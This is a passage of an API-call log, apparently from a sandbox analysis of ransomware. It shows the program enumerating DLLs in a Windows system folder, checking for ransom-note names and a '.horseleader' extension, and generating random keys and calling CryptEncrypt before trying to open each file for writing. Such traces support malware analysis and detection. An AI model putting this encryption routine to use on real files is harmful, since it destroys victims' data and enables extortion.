pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.083] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.083] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handsafe.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.083] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b36a80d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b36a80d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b6180d2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb7000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0251.083] lstrcmpiW (lpString1="msadce.dll", lpString2="Windows") returned -1 [0251.083] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 57 [0251.084] StrStrIW (lpFirst="msadce.dll", lpSrch=".horseleader") returned 0x0 [0251.084] lstrcmpW (lpString1="msadce.dll", lpString2="#Decrypt#.txt") returned 1 [0251.084] lstrcmpW (lpString1="msadce.dll", lpString2="_uninstalling_.png") returned 1 [0251.084] lstrlenW (lpString=".testttjffg") returned 11 [0251.084] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll", lpSrch=".testttjffg") returned 0x0 [0251.084] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.084] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.084] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc13c33e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc13c33e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80e1eed0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcer.dll", cAlternateFileName="")) returned 1 [0251.084] lstrcmpiW (lpString1="msadcer.dll", lpString2="Windows") returned -1 [0251.084] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 58 [0251.085] StrStrIW (lpFirst="msadcer.dll", lpSrch=".horseleader") returned 0x0 [0251.085] lstrcmpW (lpString1="msadcer.dll", lpString2="#Decrypt#.txt") returned 1 [0251.085] lstrcmpW (lpString1="msadcer.dll", lpString2="_uninstalling_.png") returned 1 [0251.085] lstrlenW (lpString=".testttjffg") returned 11 [0251.085] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll", lpSrch=".testttjffg") returned 0x0 [0251.085] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.085] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.085] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.086] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9e4ffc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9e4ffc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9e4ffc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcf.dll", cAlternateFileName="")) returned 1 [0251.087] lstrcmpiW (lpString1="msadcf.dll", lpString2="Windows") returned -1 [0251.087] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll") returned 57 [0251.087] StrStrIW (lpFirst="msadcf.dll", lpSrch=".horseleader") returned 0x0 [0251.087] lstrcmpW (lpString1="msadcf.dll", lpString2="#Decrypt#.txt") returned 1 [0251.087] lstrcmpW (lpString1="msadcf.dll", lpString2="_uninstalling_.png") returned 1 [0251.087] lstrlenW (lpString=".testttjffg") returned 11 [0251.087] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll", lpSrch=".testttjffg") returned 0x0 [0251.087] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.087] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.087] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.087] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbf732e2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfbf732e2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80e6a9c0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcfr.dll", cAlternateFileName="")) returned 1 [0251.087] lstrcmpiW (lpString1="msadcfr.dll", lpString2="Windows") returned -1 [0251.087] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll") returned 58 [0251.088] StrStrIW (lpFirst="msadcfr.dll", lpSrch=".horseleader") returned 0x0 [0251.088] lstrcmpW (lpString1="msadcfr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.088] lstrcmpW (lpString1="msadcfr.dll", lpString2="_uninstalling_.png") returned 1 [0251.088] lstrlenW (lpString=".testttjffg") returned 11 [0251.088] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll", lpSrch=".testttjffg") returned 0x0 [0251.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.088] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.088] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bee9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9bee9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9e4ffc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3f000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadco.dll", cAlternateFileName="")) returned 1 [0251.088] lstrcmpiW (lpString1="msadco.dll", lpString2="Windows") returned -1 [0251.088] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 57 [0251.088] StrStrIW (lpFirst="msadco.dll", lpSrch=".horseleader") returned 0x0 [0251.089] lstrcmpW (lpString1="msadco.dll", lpString2="#Decrypt#.txt") returned 1 [0251.089] lstrcmpW (lpString1="msadco.dll", lpString2="_uninstalling_.png") returned 1 [0251.089] lstrlenW (lpString=".testttjffg") returned 11 [0251.089] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll", lpSrch=".testttjffg") returned 0x0 [0251.089] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.089] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.089] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.089] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc0a3dca, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc0a3dca, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80edd5b0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcor.dll", cAlternateFileName="")) returned 1 [0251.089] lstrcmpiW (lpString1="msadcor.dll", lpString2="Windows") returned -1 [0251.089] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 58 [0251.089] StrStrIW (lpFirst="msadcor.dll", lpSrch=".horseleader") returned 0x0 [0251.089] lstrcmpW (lpString1="msadcor.dll", lpString2="#Decrypt#.txt") returned 1 [0251.089] lstrcmpW (lpString1="msadcor.dll", lpString2="_uninstalling_.png") returned 1 [0251.090] lstrlenW (lpString=".testttjffg") returned 11 [0251.090] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll", lpSrch=".testttjffg") returned 0x0 [0251.090] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.090] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.091] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84872aa8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84872aa8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84872aa8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcs.dll", cAlternateFileName="")) returned 1 [0251.091] lstrcmpiW (lpString1="msadcs.dll", lpString2="Windows") returned -1 [0251.091] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll") returned 57 [0251.091] StrStrIW (lpFirst="msadcs.dll", lpSrch=".horseleader") returned 0x0 [0251.091] lstrcmpW (lpString1="msadcs.dll", lpString2="#Decrypt#.txt") returned 1 [0251.091] lstrcmpW (lpString1="msadcs.dll", lpString2="_uninstalling_.png") returned 1 [0251.091] lstrlenW (lpString=".testttjffg") returned 11 [0251.091] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll", lpSrch=".testttjffg") returned 0x0 [0251.091] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.091] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.092] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3801e6, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc3801e6, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x345eeb10, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadds.dll", cAlternateFileName="")) returned 1 [0251.092] lstrcmpiW (lpString1="msadds.dll", lpString2="Windows") returned -1 [0251.092] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 57 [0251.092] StrStrIW (lpFirst="msadds.dll", lpSrch=".horseleader") returned 0x0 [0251.092] lstrcmpW (lpString1="msadds.dll", lpString2="#Decrypt#.txt") returned 1 [0251.092] lstrcmpW (lpString1="msadds.dll", lpString2="_uninstalling_.png") returned 1 [0251.092] lstrlenW (lpString=".testttjffg") returned 11 [0251.092] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll", lpSrch=".testttjffg") returned 0x0 [0251.092] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.092] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.092] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfce53b36, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfce53b36, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80fc2d90, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msaddsr.dll", cAlternateFileName="")) returned 1 [0251.093] lstrcmpiW (lpString1="msaddsr.dll", lpString2="Windows") returned -1 [0251.093] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 58 [0251.093] StrStrIW (lpFirst="msaddsr.dll", lpSrch=".horseleader") returned 0x0 [0251.093] lstrcmpW (lpString1="msaddsr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.093] lstrcmpW (lpString1="msaddsr.dll", lpString2="_uninstalling_.png") returned 1 [0251.093] lstrlenW (lpString=".testttjffg") returned 11 [0251.093] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll", lpSrch=".testttjffg") returned 0x0 [0251.093] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.093] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.093] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7d9276, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfd7d9276, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x81dbdf30, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaprsr.dll", cAlternateFileName="")) returned 1 [0251.093] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="Windows") returned -1 [0251.093] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 59 [0251.093] StrStrIW (lpFirst="msdaprsr.dll", lpSrch=".horseleader") returned 0x0 [0251.093] lstrcmpW (lpString1="msdaprsr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.093] lstrcmpW (lpString1="msdaprsr.dll", lpString2="_uninstalling_.png") returned 1 [0251.093] lstrlenW (lpString=".testttjffg") returned 11 [0251.093] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll", lpSrch=".testttjffg") returned 0x0 [0251.094] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.095] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d295c, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc0d295c, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3497fc70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5f000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaprst.dll", cAlternateFileName="")) returned 1 [0251.095] lstrcmpiW (lpString1="msdaprst.dll", lpString2="Windows") returned -1 [0251.095] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 59 [0251.095] StrStrIW (lpFirst="msdaprst.dll", lpSrch=".horseleader") returned 0x0 [0251.095] lstrcmpW (lpString1="msdaprst.dll", lpString2="#Decrypt#.txt") returned 1 [0251.095] lstrcmpW (lpString1="msdaprst.dll", lpString2="_uninstalling_.png") returned 1 [0251.095] lstrlenW (lpString=".testttjffg") returned 11 [0251.095] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll", lpSrch=".testttjffg") returned 0x0 [0251.095] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.095] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.095] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.095] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93fdbb10, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x93fdbb10, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x94001c70, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3d000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdarem.dll", cAlternateFileName="")) returned 1 [0251.095] lstrcmpiW (lpString1="msdarem.dll", lpString2="Windows") returned -1 [0251.095] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 58 [0251.095] StrStrIW (lpFirst="msdarem.dll", lpSrch=".horseleader") returned 0x0 [0251.096] lstrcmpW (lpString1="msdarem.dll", lpString2="#Decrypt#.txt") returned 1 [0251.096] lstrcmpW (lpString1="msdarem.dll", lpString2="_uninstalling_.png") returned 1 [0251.096] lstrlenW (lpString=".testttjffg") returned 11 [0251.096] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll", lpSrch=".testttjffg") returned 0x0 [0251.096] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.096] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.096] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.096] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6a878e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfd6a878e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x835d7620, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaremr.dll", cAlternateFileName="")) returned 1 [0251.096] lstrcmpiW (lpString1="msdaremr.dll", lpString2="Windows") returned -1 [0251.096] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 59 [0251.096] StrStrIW (lpFirst="msdaremr.dll", lpSrch=".horseleader") returned 0x0 [0251.096] lstrcmpW (lpString1="msdaremr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.096] lstrcmpW (lpString1="msdaremr.dll", lpString2="_uninstalling_.png") returned 1 [0251.096] lstrlenW (lpString=".testttjffg") returned 11 [0251.096] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll", lpSrch=".testttjffg") returned 0x0 [0251.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.097] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.097] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.097] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d95dfd, ftCreationTime.dwHighDateTime=0x1cb892b, 